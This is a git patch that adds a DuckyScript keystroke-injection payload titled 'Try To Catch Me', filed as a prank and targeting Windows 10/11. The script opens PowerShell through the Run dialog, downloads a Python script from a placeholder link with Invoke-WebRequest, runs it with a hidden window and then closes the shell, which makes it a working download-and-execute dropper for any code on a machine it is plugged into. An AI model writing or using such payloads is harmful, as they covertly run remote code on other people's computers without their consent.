From 58f20a1bc9199eea80992cc3df9eb870d81dd4cc Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 12 Jun 2023 09:53:36 +0200 Subject: [PATCH] Try To Catch Me --- .../library/prank/Try_To_Catch_Me/payload.txt | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 payloads/library/prank/Try_To_Catch_Me/payload.txt diff --git a/payloads/library/prank/Try_To_Catch_Me/payload.txt b/payloads/library/prank/Try_To_Catch_Me/payload.txt new file mode 100644 index 0000000..e6b1f58 --- /dev/null +++ b/payloads/library/prank/Try_To_Catch_Me/payload.txt @@ -0,0 +1,34 @@ +REM #################################### +REM # | +REM # Title : Try To Catch Me | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Prank | +REM # Target : Windows 10/11 | +REM # | +REM #################################### + + +REM Requirements: +REM - Internet Connection + +REM REQUIRED - Set your Python script link +DEFINE SCRIPT-PY-LINK example.com + + +DELAY 1000 +GUI r +DELAY 500 +STRING powershell +ENTER +DELAY 500 + +STRING Invoke-WebRequest -Uri " +STRING SCRIPT-PY-LINK +STRING " -OutFile "script.py" +ENTER +DELAY 500 + +STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden +DELAY 1000 +ALT F4